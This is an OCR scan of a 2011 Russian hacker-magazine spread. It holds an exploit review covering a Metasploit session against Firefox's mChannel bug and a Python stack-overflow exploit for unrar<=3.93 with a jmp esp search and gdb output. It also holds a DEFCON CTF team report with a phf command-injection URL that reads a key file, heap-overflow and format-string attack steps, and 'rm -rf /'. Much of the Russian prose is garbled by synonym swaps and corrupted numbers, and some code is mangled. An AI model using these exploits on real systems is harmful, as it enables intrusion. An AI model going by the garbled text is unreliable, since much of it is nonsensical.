вимого кода, ты да я далеко не сможем определённо утверждать, получи и распишись какую инструкцию

пsiChaппeiEveпtSiпk] безвыгодный имеетназначенного mChaппel . Пробл ема во

во памяти оно попадет. П отому-то равно пор-цепочка н олигодон н а. Те хника

том, который mChaппel является слабой ссылкой !как предназначено на сопtе пt/

spгaying во основном используется около эксплуатирова нии уязвимастей

ХАКЕР

00/153/2011

heap

ВЗЛОМ/ОБЗОРЭКСПЛОИТОВ

08055082 00 00 F4 EF FF FF
08055088 09 F2
08 055 08А 09 09
0805508С 00 04 06 00

lllOU

еЬх, [ ebp+src ]
edx, esi

lllOU

есх ,

lea

Указатель

в строк~ не без; оwибко

еЬх

lea

Дизассемблерный листингуязвимого места для того unгаг<=3.93

на браузерах, бо близ помощи JS- скри пт ов, выполняющихся в стороне
клиента, наша сестра получаем возможностьуправления гуртом , об которой было
упомянуто выше.

Практическая демонстрирование уязвимости nри помощи модуля

архи проста: поднимаем сервер пр равно помощи

metasploit "a,

MSF

вперед получай

"

Unrar 0.9.3 Local Stack
Overflow Exploit

IAV:L/АС: L/Au :N/C: С/1: С/ A:CI

клиен т, вбиваем во Fiгefox адресочек сплоита да видим ре з ультат работы экс­
плоита-эаnустившийся калькулятор:

[]Im
Дата релиза:

msf# exploit(mozilla_mchannel) > set PAYLOAD windows/exec
PAYLOAD=> windows/exec_ _
msf# exploit(mozilla mchannel) > set CMD calc.exe
CMD=>~qlc.exe~---·
msf# exploit(mozilla_mcмnnel) > exploit
[*] Exp loit running as background job.

02
011 01 0

CVSSV2

01111 0111 011 011 011 01
0 авгу не без; та 0011

года, автор: ZadYгee,

CVE: N/A.

Unгаг- ра вместе с пространенная во среде * ni х -пользователей обслуживающая программа ,
предназначенная с целью извлечения, тестирования да nросмотра содер­

жимого архивов, которые были созданы около помощи архиватора

RAR.

Уязвимость, которую обнар у жил ZadYгee , кроется внеправильной
обработке аргументов, поступающих получи и распишись сени утили т е.

ljЗЦ!•Iii

[*) Using URL: http://0.0.0.0:8080/cnGnliQгNQYE
[~] Local IP: httg_:_//192.168.0.23:8080LcnGnlibrNQYE
[~ ] Server started.
·- ______

Fiгefox

плоита равно получил сл е д у ющее :

i .mport sys _
from struct import *

jf.!;lдjfi

Mozilla

Я позволил себя крошечку подправить самодеятельный разночтение экс­

0.6.1 0

""i•l!liii•J:I

buf=" -" + "Зlrvs" * 017 + " АдА " + pack( "I", 0x8070197)
shellcode=" \x!; c\ x c c\xcc \ x c~\J@ a\x aa\ x aa \x aa\ x bb\x b b\x bb\x bb\_

Существуют обновления, устраняю щишки е данную слабость .

x cc \ xcc\~~!;"\~xdd \x dd \x cjd \xdd"

050

ХАКЕР

00 / 053/ 0011

В ДАЛЬНЕЙШЕМ МЫ СМОЖЕМ
ПОНАБЛЮДАТЬ ВООЧИЮ, КАК

ИСПОЛНЯЕТСЯ КОД ПОЛЕЗНОЙ
НАГРУЗКИ НА СТЕКЕ

f=opeп(" expl_optioп" , "wb" )
f.write(puf + she,)Jcode ~~12" )
f.close()_ _
В д а льн ейшем да мы со тобой вместе с тобой сможем п об наблюд ать воочию, наравне ис­

п в рассуждении лня е т вместе с ваш покорнейший слуга адрес секс ез утнапиштим нагр узк да н а сте для е, н у а в эту пору который н еобхо димо
разобратьсястем,откудавзялсяадресОхВО70197вкодеэксплоита.
Перед н ами классическое п ере п ол н е ни е грудь получай стеке со вы­
текаю щ ей с сего места перезаписью адреса возврата. Так во вкусе словарь сверху

полезную н аг р узку ле жи т на регистре

es p, в таком случае нам ничего не поделаешь прыг­

нуть бери команду jmp es p !или др у г ую до из ледоват е льность ко манд ,
имеющую схожее д ействие!, соо тв е т не без; тв е нно , к сие го да мы не без; тобой должны
перепечатать ячейка возврата адресом команды

jmp esp. Та для найдем а

в соответствии с д обн ы е а др еса во исполняемом м в отношении дул е uпгаг"а.

! ~ - ~)_QQ_jd um p -JLL usr/ Ьiп L uпrar J_gcrl) "ff е4" J_greJLjШJ1_ __
00бfebf :

0070197 :
0070317 :
007038f :
0070527 :

ff
ff
ff
ff
ff

е4

е4
е4

е4
е4

"m11
jmp
jmp
jmp
jmp

*%espc___ _ _ _ _ _ _ __
*%esp
*%esp
*%e sp
*%esp

В результате уяз вим ос ти у правл е ние настил учае т код, располагаю­
щийся получи стеке :
(~ -~)

gdb --args uпrar "cat expl_optioп
symbols fouпd)
(gdb) r
(по debuggiпg

Star tiпg_program: Lusc/ l:!iп L uпra ~ЗlrvsЗlrvsЗlr~s .•• sЗ lrvsA~

ERROR: Uпkпоwп optioп: 0lrvs3lrvs3lrvs .. . ЗlrvsAA ...
Program received sigпal SIGТRAP, Trace / b re akpoiпt trap .
0х ЬfаЬб405 iп

?? ()

0: xL.L$_p_s:_
0xbfab_9_4_es_;__in.a .__ _
(gdb) х/20х $eip-1
0хЬfаЬб404 :

0хсссссссс

0хаааааааа

0хЬfаЬб414 :

0хЬfаЬб400

0х080б7f22

0х080бесб0

0хЬfаЬб424 :

0xdddddddd
0xbfabfdfa

0хЬЬЬЬЬЬЬЬ

0х08048Ь97

0хЫ483а8с

0х00000000

0хЬfаЬб434 :

0х00000000

0хЬfаЬба98

0х080б80е7

0xbfaЫf98

0хЬ_{.аЬб444 :

0xbfabfdfa

0х08048с77

0хЫ48За8с

0х080484б0

0хсссссссс

WEXLER.BOOK Е5001
«МПРО 0033 » ДМИТРИЯ ГЛУХОВС КОГО И ЕЩr ДВА РОМАНА КУЛЬТОВОЙ СЕРИИ БЕСПЛАТНО
В ЭТОЙ ЭЛЕКТРОННОЙ КНИГЕ WEXLER

(gdl:!)_ Что равным образом требовалось дезоксикортикостеронацетат ради ть . Н у а со д е ржим ое п что до л ез только й нагр узки

СТИЛЬНЫЙ ГАДЖЕТ

остае т ся тотально сверху твоей со ве сти .

it·1;11Jttt:t:t
uпгаг<=3.93

,_i•J!Iiii•HI
К сожа л е нию , патчей, усишко тр аняю суп х данн ую уязвимос ть , автор этих строк н е нашел. Н в отношении
всякий раз допускается сам образовать недавний сегме нт во исполняемом

мо д уле uпгаг ·а, д обави ть т пенис а ко д п что касается пр оверке для педикулез входных ар­
гументов равным образом поставить соответ ствующие прыжки во нужные места .

ХАКЕР

00 / 053/2 011

:::1:::


ф WI!XLI!Г.

www.wexler.ru

рвЩ.Щf"\1"

ТЕЛЕФОН ГОРЯЧЕЙ ЛИНИИ : 0 {800) 000 06 00

Ромася

взламывание

<<zyx2145>> Василен для о, laKasperskylab

Mapaт « touzo k U >> Bыweropoдцeв, lаИнформзащита

ОТЧЕТ С ХАКЕРСКОГО КОНТЕСТА ИЗ ЛАС-ВЕГАСА
В Лас-Вегасе завершились двум
крупные хакерекие конферен­

ции :

BlackHat 0011

равно

DEFCON 09.

Последняя интересна далеко не только лишь
сног не без; шибательными докладами,
однако равно з наменитыми соревнова­

ниями в области компьютерной безопас­

ности « Captuгe The

Flag » [CTF), во

которых впервой приняла уча­

стие отряд с России . Как сие

было равно что такое? вместе представляют
лицом такие хак-квесты, расска­
жут непосредственные участни­

ки событий .

ОХО1. ЧТО ТАКОЕ CTF?
Са й твоя милость команд:

Captuгe

• Hackerdom:
www.hackerdom.ru:
•Lee!More:
leetrnore ctf.su;
•SiBears:

наборуязвимых приложений-сервисов. Основная равно дея заключается во

~;

• Smoked Chicken:
smokedchicken.org .

the F lag-этo игра,

на которой команды получают во рас п оряжение

том, дабы крушить сервисы быстрее других искажение н д, п исатьэксплоиты,

благоденствовать п атчиться, охранять совершенно во рабочем состоянии равно -н а н еко­
торых играх-е щ е равным образом описыватьуязвимости во бюл л етенях безопасности

после вплоть до п олнительные гляделки . Эдакая кибервой н а на миниа т ю р е . Со р евнова­
ния проводятся, в духе п рав равно ло, через нескольких часов д по отношению нескольких суток,

неоднократно минуя п ерер ыв овна сон. Су щ ествует д ва ос н по части вн ых т равным образом п а CTF: «Своя
игр а» да ко л монета ич еский ва р иа нт. П е р вый чаще ис п ол ьзует ся держи насчёт т бороч­
н ых соревно на а н иях, вт насчёт р ой н а фина л ь н ых, п оско ль ку дл мы для л ассического

СТ Fт ребуется ибо л ее сложная инфраструкт ура.
В мире существуетнесколько подобных соревнова н ий, вклю ч ая UCSB
iCTF, NuitDu Hack, plaidC TF, RuCTFE да др . DEFCON CTF п роводи тся от 0996 г.
да является старей ш им и, наверное, самым престижным с них . В п ервые
российская искажение н безусловно прошла во завершение равно занялатам почетное 0-е площадь . Мы

опередилитаких бизо н ов, на правах командуУниверситета Калифор н ии Санта­

Барбары [устроителей iCTF), командуУниверситета Ка р неги-Меллона,
корейцев изо P OS TE C H- Pohaпg, от п ециалистов иэ что до д утнапиштим п равительствен­
н ой вое нн ой комок п а н ии С Ш А, а вот и все япо н ских, испа н ских равно аме р икан ­

ских пр офессио н а л ов во ИБ . Н относительно об во всем п что до п по части р ваш покорный слуга д ку.

052

ХАКЕР

00/153/2011

DEFCON CTF

ОХО2.

DEFCON CTF PREQUALS

Отборочные зрелище

Defcon СТF проходят во формате Jеорагdу-англ .

названиетелеnередачи «Св оя забава >>. Участникам предоставляются

05-30 заданий разной сложности да стоимости во таких областях И Б,
по образу геvегsе engineeгing, foгensics, Ьinагу exploitation, packet analysis
равно т . д. При данном формате зрелище оболочка нда м н е нужно оберегать близкие
се рверы да приспособлять патчи- необ хо димо несложно отгадывать задачи,
багрить изо них флаги да исполнять их на форму ответа. Обычно,
решая задачу первой, майна получает бонусные глаза следовать « nервую
кровь».

Такой параметры зрелище меньше динамичен, только позволяет одновремен­

же выступать несграниченнему числу команд. В сие м году во отборочных
равным образом гр ахти зарегистрировалось сильнее

000 команд, равно сненулевым в количестве
080. Интересно, ась? с России на этом году выступа­
ла сборная директива Team IV, возникшая на результате слияния четы­
закончило паче

рех сильнейших команд по части результатам прошлых соревнований:

Hackerdom- Уральскийфедеральный альма-матер ;
Leet Моге-Санкт- Петербургский государственно-монополистический у нив ерси­
тет информационных технологий, механики равным образом оптики;

SiBears- Томский коммунальный университет;
Smoked Chicken- Южно-Ураль не без; маз общественный университет.
Объедини во усилия, пишущий сии строки программа равным образом ровали от жулик первой российской
командой во финале

DEFCON CTF не без; претензией в победу. По иронии

судьбы, майна заняла 0-е полоса получай отборочном каста п е равным образом таким
образом попала во каталог тех

02 команд.

которые согласно регламенту про­

ходят на финал. Для примера прив е дем н есколько вслед даний .

Форматпередачи « Своя равно гран: разныеобласти ИБ равно разная сложностьзаданий

GRAB100

PWTENT PWNABLES 000

Веб-сервер для

Бинарникспереполнениемкучииутечкойпамяти

SPDY
На порту 0932 вслед пущ ен далеко не какой-никакой сервис. По сле продол жи ­
тельных манипуляций выясняется, зачем сие apache, ходящий до
протоколу SPDY !улучшенная выполнение НТТР через Google]. Нахо­
квартал бажный не без; крипт на /cgi-Ьin/ равным образом пробуем вытаскать источник со временем

изучения директорий

Реверс бинарника показывает, почто возле посыл ке команды

upload_
classel иначе говоря class82 на
случайном порядке . Метод class_82: :сору _buffer уязвим ко перепол­

new_record

создается единолично экз емпляр класса

нению сиськи , которое дает24 байта перезаписи на куче.

http: / /pwn583.ddtek.Ьiz :5932/cgi-Ьin/

phf?Qalias=%8Acat%28/home/TkfбzKZd/key. Не срабатывает !филь­

void Цass_82::co py _b uffec.(class_82 • this , char • buffer)

труется ответ keyl. Меняем запрос: http://pwn583.ddtek.Ьiz:5932/

{

cgi- Ьin/phf?Qalias=%8Aca t %28/home/Tk fбzKZd /k*. П случае м флаг:
that "s fast enough now go take а rest.

unsigned int i;
for (i=е ; i <=248 ; + + i) this ->buffer[i]=buffer[i];

___ - - - - - - - - - - - - - - - - - - - -

}
FORENSICS 000
Образ NTFS вместе с необычным файловым атрибутом
Выданный обложка размером как часы 00 Мб представляет на вывеску отражение
ди ска от NТFS"ным разделом. Волга ско п ки загрузчика во MBR нисколько невыгодный дали, возьми хоть спирт равно выглядел отнюдь не нимало стандартным. Засунув
представление во

X-Ways Foгensics, ты да я увидели, аюшки? на корне раздела лежат
000 каталогов вида dir**, во каждом изо которых к примеру в соответствии с 020
файлов. Всего 01 078 файлов, и оный и другой со уникальным содержимым,
попадающим почти регулярное формулировка ([e-9a-f]\8{24}){48}.
Натравив утилиту ntfswalk, обнаружили nодозрительный файл\

Используя эту а уязвимость, ты да я можем выправить вновь равно перемен­
ные

buffer_len

да

class_count, а

по времени потребовать команду

dump_obj,

котораяскопируетстолькоданны~ ск олькоустановленовзначение

buffer_len. Затем пишущий сии строки создаем сколько-нибудь экземпляров класса, удаля­
ем один, таково в чем дело? возлюбленный образует дыру на куче, гораздо поэтому помещаются ма­
ленькие объекты слыхать

hash_str другими словами rb_tree_item. Далее вызываем
view record, с намерением посм отреть, идеже на куче находится rb_tree_item.
Используя rb_tree_item, узнаем местоположение нашего экземпляра класса равно
грудь от нашим шеллкоде м . Переписываем vftaЫe, где-то ради возлюбленная

dirб8\key58883 . Подозрителен возлюбленный был тем, ась? его файловая отметка

указывала держи отечественный шеллкод, равно вызываем любую функцию, так чтобы спирт

во $MFT содержала н естан дартный NТFS-атрибут вместе с номером 01 Oh,

сработал. Получаем шелл.

в то время на правах во <<стан дарт е>>
поменьше

NTFS описаны только что атрибуты со номерами
BINARY LЗЗTNESS 000

000h.

Мы заглянули на текущий 010h-й аксессуар не без; через однако того но

Исполняемый РЕ-файл сантиотладкой

X-Ways F oгensics, расковыряли его lструктурно симпатия был п охож держи

При первом просмотре обложка по сути дела неупакованным, так содер­

атрибуты известных типов], вычислили, на каких кластерах храня тся

житвсеголишь три импорта:

его способности , равным образом вытащили их. Вообще, естьдовольно распростра­
ненная практи ка прят ать секретные сведения во <<а льтернативных

потоках данных

NTFS >> - атрибутах от номером 00h, отличающимся

CloseHandle;
HeapAlloc;
memset.

именем потока. Для поиска да пр осмо тра альтернативных потоков
данных питаться толпа готовых утилит, видимо, следственно организато-

Это означает, ась? целое оставшиеся функции некто получает подвижно

ры поступили хитрее да спрятали факты на самодельном NТFS­

и, во вкусе невыгодный запутанно обнаружить, делаетэто чрез РЕВ сра зу по прошествии ОЕР.

атрибуте. Извлеченныебайтики имели согласно правилам такого типа а вид, в духе равным образом

После сего расписание создает изрядно потоков от антиотладкой.

обычноесодержимоевсехостальныхфайловlмаскировалисьпод

Некоторые используемые повадки антиотладки:

них] . Выкинув нулевые байты, получили ответ:

e83Se21ce888934d4c8f7e.

ХАКЕР

00/153/2011

07a96fac9edb9Se641

NtQueryinformationProcess with (push leh ; ProcessDebugObjectнandLe);
Rdtsc check;

053

хакинг

ОХОЗ. ФИНАЛ. КЛАССИЧЕСКИ И

CTR

Финальные зрелище проводятся во классическом формате, приближенном для

CREDITS

реальномухакингу. Каждая распоряжение имеет пакет сервисов, работающи х
либо в отд е льном се рвере , либо держи виртуальной машине, либо, по образу во настоящий
раз, вн утриjаil. Основная следовать дач а-за щищатьсв ои сервисы равным образом ударить

Хотелось бы поблагодаритьтех ребят изо команды

IV !читается равно как рим­

ч ужие. Результатуспешной атаки -по хи щенный символ противника. За

ская << четверик », ежели и иностранцы завистливо называют нас <<ай ВИ>>I,

перезапи сь флага пр отивника начисляются дополнительные очки. Свои

которыеучаствовали на отборочных, да до разным причинам никак не смогли

а флаги н стрела-змея же храни ть на неприкоснов енности, так на поперед сту пностидля

попасть бери финал: кому-то невыгодный дали визу, черт-те где безвыгодный сделал спонсоров

проверяющего скрипта жюри. Финал соревнований ради хо дит во очной

покрыть поездку, один человек ушел во крыша мира . Команда благодариткомпании

форме, по сию пору команды собираются во одном большом зале. Благо, на в отношении теле

НИП <<Ин формзащита » следовать элементарный вкладывание на оплату поездки своих

Rio, на котором относительно хо дила

сотрудников, СКБ <<Контур» следовать филантропия екатеринбургской части

Лас-В е га из славится самыми большими отелями во мире. По регламенту

конференция, таки х помещений предостаточно : неэря

команды, университеты следовать багаж да помощь.

DEFCON CTF, следовать од ним столом нужно не без; идеть отнюдь не больше восьми индивидуальность
сильная сторона одна овца. Овца? Да , организаторы соревнований далеко не стесняются

своей страстной любви для s h eepfuck iпg , да какое сие имеетотношение для
информационной безопасности, миздрюшка невыгодный знает. Кстати, вслед фотографию

совокупле нияснадув н ойрезино войовцойоргани заторыраздав аль
эксклюзивныефутболки-стоит ли говорит ь, чтофутболки разашлись
на п ервыедеся ть минут равно на нашей командетаких футболок двум ? Вне вместе с тола

NtSetinformationThread with (push llh ;

ThreadНideFromDebugger) .

Обойти их непросто, только отыскать побольше подробную информацию от м, как бы
э так сделать, отнюдь не составиттрудадля искушенного читателя. Затем nроцесс
выделяетпамять равным образом копируеттуда код, со держащий фундаментальный п в рассуждении лезный

функционал,дальнейшееисполнениепроисходитввыделеннойпамяти.

Однако yes ли просто-напросто материализовать программу давно конца равным образом снятьдамп, ведь
на нем пишущий сии строки найдемтолько конфигурация известных философских цитат. В ся сольца
вместе с прятан а во алгоритме их расшифровки. При расшифровке используется

ключ, который-нибудь кладется в стека да удаляется изо адресного простран не без; тва
процесса. Именно поэтом у, коли сместить дамп , на смену ключа пишущий сии строки получим

вoттaкoйнaбopбaйт:eseeszeeeseeszeeeseeszeeeseeszeeeseeszeeesees

0eeeseeszeeesees2ee. Ес ли а проанализироватьалгоритм расшифров­
ки подотладчиком-о чудо, вона равным образом свой ключ: 0FEЗ90ЗDF19E4B01ACS90FBA67

0DC8752BD68339E49147F29F5502AD6310BB71.

051.

ХАКЕР

00/153/201 0

DEFCON СТF

Сервис:
Порт:

Castle

0629

Функциональность: При соедине нии читает сведения изо сокета перед

появл ен ия

<< EOF\n >> . Считанные исходняк сохра няются умереть и невыгодный встать временном
<</tmp/cast leXXXXXXXX>>, идеже ХХХХХХХХ- случайные
После сего castle перенаправляет stdin, stdout равно stderr

файле вида
значения .

на сокет равно запускает второй исполняемый обложка /usr/local/Ьin/sandy со
параметрами <<-о < IPvб >

-d -s /t mp/cast leXXXXXXXX>>,

идеже IPvб-

адрес, не без; которого содеялось соединение.

Уязвимость: Непосредственно ранимость находилась на

Ход решения: См.

sandy.

sandy.

Cepвиc:Bunny
Порт:

05323

Функциональность: При установке соединения служба вместе с через

srand(time(e)) генерирует псевдослучайное величина и круг [ma x_ sizel через 0
04. После сего закрывает предыдущее связывание равно генерирует
сызнова одно п севдослучайное количество [rand_portl, да сделано во ди апазоне
ото 0024 давно 05 034, да использует его в духе nорт с целью ожидания нового

по

соединения [Ьind+listenl . Если ради исходит связывание держи определённый
порт, ведь считывает

0 байт равным образом сохраняет
max_size раз.

во массиве длиною во

02

байт .

Повторяет операции

Уязвимость : Как не запрещается заме тить,
рядом этом скопление

haystack

всего делов

ma x_size может фигурировать до самого 04 байт,
02 байт - явное захлестывание

буфера. Однако поглощать пара подводных камня . Во-первых , интересах того
с целью сочинять на буфер, нужно смыслить пункт случайного порта ,
а симпатия через

0024

предварительно

05 034.

На подспорье присутствие ходит ведь , зачем

seed

подле

инициализации генератора псевдорандомных чисел равен

time(e) ,

а системное эпоха у всех команд что касается дин аковое. Во-вторых ,

захлестывание весть маленькое, такое маленькое, который перед хо дящи х

зкс плоитов такого размер а нет. Хитрость на томишко , что такое? эдак наравне

max_size
массивом

лежит возьми ст еке, в обществе геt-адресом равным образом переполняемым

haystack,

нужно сдуть его, а приближенно по образу возлюбленный является

счетчиком итераций, в таком случае затем сие го дозволительно утилизировать столько

памяти интересах экс плоита , как потребуется.
Ход решения: <<Хорошая мысля возле ходит опосля>>- во данном случае
сие вот поэтому и есть выше- кейс. П ереполнение нашли, родной служба запатчили,
так эксплоит чего-то враз никак не получилось написать, да появился симпатия у

нас как только около завершение игры. Что ж, во следую щий в один из дней будем проворн ее.

Сервис: Hiveг
Порт:44366
Функциональность: Пр да соединении читает данны е с сокета :

первые

0

байта- длительность жете кета , дал ее сам по себе пакет. Создает фильтр

Бл ума, во котором опре деле же

счи тывает полотнище изо файла

равным образом использует его во качестве битового

key

разных хеш - функций. По из л е зто го

массива. Считанные изо Сети способности использует про проверки того,
принадлежат ли они для битовому множеству либо перевелся . На выходе возле

каждом запуске из аюшки? можно заключить подборка изо

значащих бит. По зи ция

каждого лапта соответств ует номеру хе ш -фу нкции во фильтре Блума ,
спица в колеснице соответствует значению лапта изо флага , чья соответственно зиция
вычисляется нате основе хеша .

Уязвимость: Сгенерировать такого склада сверток входных параметров, воеже
пр ограмма отдала однако значения битов с фла га, затем аюшки? скопить изо
них флаг.

Ход решения: В минута ночи, в дальнейшем первого дня соревнований, усталые
И расстроенные тем фактом, аюшки? возьми лицо вразрез нашей команды
накануне этих пор О очков, пишущий сии строки решили переправить ситуацию. Через п ару часов
эксплоит был будь по-твоему и, довольные , автор завали ли сь спать.

ХАКЕР

00/153/2011

055

взламывание

КАКИЕ ЕЩЕ ЕСТЬ

CTF?

The UCSB iCTF
ictf.cs .ucsb.ed u
Международные студенческие соревнования,
которые проводитуниверситет Калифорнии Санта­
Барбарывначале декабря. Известны, загодя
всего, тем, который от

0008 г.

произвольный бадняк сносят крышу,

придумываясовершенноновыеправилаигры,

которые в большинстве случаев нигде никак не встречаются.

CODEGATECTF
www.codegate .afg
Корейцы известны своей любовью для киберспорту.
Ежегодно на Корее проводится

0-4 CTF, связанные

как правило не без; конференцией по мнению ИБ .

CODEGATE CTF,

некоторый проводится на начале мая, является одним
с лучших tаsk-Ьаsеd-соревновани й.

RUCТFE
www . гuctf . oгg

количестволюдей неграмотный регламентируется , поэтомунекоторые читеры !не

Команда Hackeгdom изо УрГУ -первая российская

будем изображать пальцем сверху команду с Японии! сидели равным образом реверсили

команда, которая альфа и омега делать ход на

дамба CTF на России. С

0007 г.

CTF равно

продви­

не щадя сил организуют

студенческие всероссийские соревнования
С

0009 г.

RuCTF.

во декабре проводят международные со­

ревнования, которые отличаются стабильностью,

масштабностью равным образом интересными сервиса ми.

наполурядомсостоломвсреднемколичестве20человек.Намвэтом
смысле малограмотный повезло, т. к. большей части команды безвыгодный дали американские

визы послеупоминания словосочетания <<компьютерная сохранность >>
получи собеседовании во консульстве. Удаленно поучаствовалоочень скудно
игроков, на основном с подачи разницы кайфовый времени.

CTF начался стого, зачем пишущий сии строки обнаружилитолько флешкус ключами
доступа ко своему серверу, двуха LАN-кабеля lдо сервера равным образом поперед игровой

plaidCTF
www.plaidctf.com

сети!, однуэлектрическую розеткууевсего стола. Пришлосьбратьтакси

Команда РРР изо Карнеги-Меллон, появившаяся на

блекджек равным образом распутна свичи равно для вода, т. к. пустое место изо организаторов малограмотный

0009 г.,

предупреждал об их отсутствии. С задержкой во три часа удовольствие началась, равно

илететь на ряды электроники неподалеку, чтоб потратить$300 возьми

зараз азы представлять высокие результа­

твоя милость только что-нибудь не получай всех соревнованиях. Послетого что им

во кабелях появилсялинк. Чтоделать дальше, нужно былоузнать самим.

поперек середыша всех обыгрывать, они решили скоротать

Запускаем снифер получай кабеле для серверу, видим IСМРv6-трафик. Вспоми­

своисоревнования . Парниоправдалиожидания

наем, что взметать 0Рv6-интерфейсы, при случае узнаем, который целое руки и ноги ко­

равно устроили во апреле соревнования со интерес­

манды прогуляли Woгld

нейшими заданиями равно необычным геймбордом

совершенно сервисы были написаны подо 0Pv6. Пришлось немедленно записывать

lgameboaгdl во виде плана здания.

вседомашниезаготовки подшестые со кеты.

PHDCТF

чтоJаil-это аппарат виртуализации уровня ОС на FгeeBSD, позволяю­

0Pv6 Day. Сюрпризом зрелище было то, зачем в полной мере

Сервер представлял собою FгeeBSD

0.2, разбитый Jail. Напомним,

phdays . гu/ctf geпeгal . asp

щий учредить порядком независимых мини-ОС со своим набором прило­

Positive Hack DауsСТF-международные сорев­

жений равно настройками. Таким образом, каждая экипаж работала во своем

нования позащите информации , которые в коренной раз

Jail"e, а организаторы

проводились на мае

Именно чepeзJail организаторы обновляли да проверяли файлы со флага­

0011

г. Запомнились заблаговременно просто-напросто

отличной организацией, масштабностью, интерес­
ными сервисами равно разнообразными заданиями.

беспрестанно имели контролирование надвсеми системами.

ми. Данный прибор отличается через привычного нам, при случае флаги про­
веряются да обновляются лично от работающие получай системе
сервисы,видим~разработчикипростополенилисьписатьсистемукак

следует. Мы неграмотный преминули пустить в ход сим недостатком: затем что
сервисы были действительно неграмотный связаны от флагами, наш брат затуннелировали
весьтрафик да перенесли совершенно приложения бери отдельную виртуальную
машинутаким образом, что, ажно получив доступ, соперники невыгодный могли

ИДЕЯ ЗАКЛЮЧАЕТСЯ В ТОМ,
ЧТОБЫ ЛОМАТЬ СЕРВИСЫ
БЫСТРЕЕ ДРУГИХ КОМАНД,
ПИСАТЬ ЭКСПЛОИТЫ, УСПЕВАТЬ

ПАТЧИТЬСЯ И ПОДДЕРЖИВАТЬ
ВСЕ В РАБОЧЕМ СОСТОЯНИИ
056

просмотреть наши флаги, находящиеся получай реальном сервере, а ты да я могли
срывать равно рассматривать трафик, жалующий для нам.

Игровые прицел начислялись командам после раскрадывание флага и/или
перезапись своим специальным флагом-маркером. После перезаписи
флагиавтоматическивосстанавливалисьвпрежни~сохраняявоз­
можностьдругим командам разворовать их. Начисленные прицел вслед флаги
умножались получи выигрыш доступности сервисов, предотвращая ситуа­

цию, когда-никогда команды попросту выключили бы однако сервисы да достигли
000%-нойзащиты.Доступностьсервисовпроверяласьчерезбэкдорв
приложениях- буде бэкдор жив, значит, равным образом адденда работает. До­
полнительныеочкиза«первуюкровь•давалиськомандам,которые

первыми сумели проэксплуатировать небезукоризненность на сервисе.

ХАКЕР 0О /153/2011

DEFCON CTF

Сервис: Foгgetu
Порт:

0128

Функциональность: При соединении во три этапа читает исходняк изо сокета .

На каждом эон е в области данным якобы хеш-функ ция через п олученны х
данных, да коли хеш удовлетворяет указанному, так расписание переходит

нате нижеприведённый этап. На первом этапе совершенно просто: нужно невыгодный нажить хе ш,

равен 0хВ3300703 [он используется организаторами чтобы активации
бэкдора, проверяющего дееспособность сервиса ! . На втором сия п е
нужно унаследовать хе ш

exFC1BE02A,

в то время схема соглашаться дальше. При этом

максимальное спица в колеснице считываемых данны х с сокета держи э ти х этапах

027 байт, который малограмотный превышает размер выделенного получи стеке массива.
Уязвимость: П ере п олнение женские груди находится получи третьем буква пе, при случае
за подсчета очередного хеша по мнению входным данным план

использует хе ш на качестве значения максимального количества байт
быть считывании сл едующей порции данных. Вот тут-то во стекавый жопа

[datal размером во 028 байт позволено застенографировать столько байт, сколько ко нужно
в целях переполнения равно эксплоита [последний бис RacvDataFromSocketl .
Ход решения: К большому сожалению , купились сверху немаленький размер
файла равно неграмотный стали анализировать его во самом начале, пускай бы захлестывание
ахти простое- сбрутить хеш равно писать зксплоит.

ОХО4. ОРГАНИЗА ИЯ
Примеры заданий пишущий сии строки привели нет слов врезке, а больше д ета льное дефиниция

Cepвиc:Sandy

взлома каждого изо сервисов равным образом прим е ры экс плоитов твоя милость можешь

обнаружить во благах нашей команды . Стоит отметить, который игрище во зто т крата
была спроектирована с рук уходить плохо. Обычно разработчики

CTF

стараются сблизить возьми кто в отсутствии шанс получения рут а. Иначе, по­
лучив рут, первенство сможе т тяпнуть флаги ото сервисов, которые отнюдь не

были по-на не присаживаясь щему взломаны, а под конец провести в жизнь
/ », преждевременно заве ршая игру с целью со п ерника. Сервис
был угнетать льготы вместе с гооt предварительно юзера

«rm -rf
tomato принуждён

tomato , только такогоюзеране

Порт: -

Функциональность:

Sandy представляет с лица один не без; ильно

неусложненный комментатор языка С.
Уязвимость: Ч ерез

castle дозволено отдать программу, которая бы

считывала ключи да отправляла равным образом х нам, а гуртом да пер еза писывала бы
ключи у соперника. Однако н е постоянно что-то около не мудрствуя лукаво . К сожалению,

fopen далеко не

су ще ст вовало- зато существовал tomatoг. Проэк сп луатировав зто

интерпретировался должным образом равным образом пришлось приискивать обходные

приложениена сервереневнимательной команды, позволительно было полу­

варианты.

чить гооt да сбросить весь флаги. Мы нашли однутакую команду, успели
Ход решения : Fор еп исnользовать грешно , зато подходяще работает

ста щить до сей времени флаги, однако закрепи ться, для сожалению , никак не успели.

На следующий число первенство l оl lег skВtе г zумудрила сь обогнать ограни­

чения разработчиков равно исчерпаться изо Jail"a , получив рут бери хае т-машин е.

fpгintf, во которую на ка честве параметров позволяется изобразить уязвимую
форматную строку да при случае эксплоит.

Ребята собрали всегда флаги со всех команд, же по неизвестной причине неграмотный озаботились
доступностью своих сервисов, позтом у очков из-за делать отнюдь не смогли давно

того момента, что разработчики совершенно запа тчили .
На беспристрастный д ень зрелище ча сть наши х игроков, никак не занятых ревер сом, ре­

Сервис: Sheepsteг
Порт:

0775

шила просканить сетки других команд во поисках чего-нибудь вкусного
нате пользовательских машинах. Забавно было откопать официальный веб­
сервер команды

Функциональность: При соединении читает показатели с сокетаи
сравнивает со указанными значениями. Если из равнения прошли усnешно,

PLUSfaPostech со всеми их наработками в соответствии с экс плои­
там, лагами работы зксплоитов не без; флагами равно приватным ssh ключом
ото их сервера. На DEFCON не без; вашим компьютером может nроизойти в чем дело?

в таком случае для сит включить псевдоним да прив етствует:

у годно , не фунт изюма безграмотный заб ывать об зто м.

блага, во котором дозволительно присовокуплять равно nросматривать из-за писи .

ОХО5. WHAT HAPPENS IN VEGAS STAYS IN VEGAS
После соревнований наш брат сняли пентхаус для 09-м эт аже отеля

Bellagio

равно устроили afteг рагtу из блекджеком равным образом pttettyТ застегни рот хма вслед за тем равным образом равно до эз ией

Ш експи ра. Ла со В е га из - зто остров , во ко тором абсолютно безграмотный хо ч е т ся
делать информационной безопасностью, тем не менее недалеко
посетителей

05 000

Black Hat да DEFCON из года в год приезжаюттуда, ради

<<Welcome to the ddtek

Ьlog » .

Само по части себя пр иложение предста вляет с лица адаптированный род

Уязвимость: П ер ваяпроверка введенны х данных оборона ходит со строкой

<< zzyzxrd ». Если возлюбленная прошла успешно, в таком случае выставляется флажок [flagl, близ
котором на дальнейшем во программе вме сто fputs используется fpгintf из
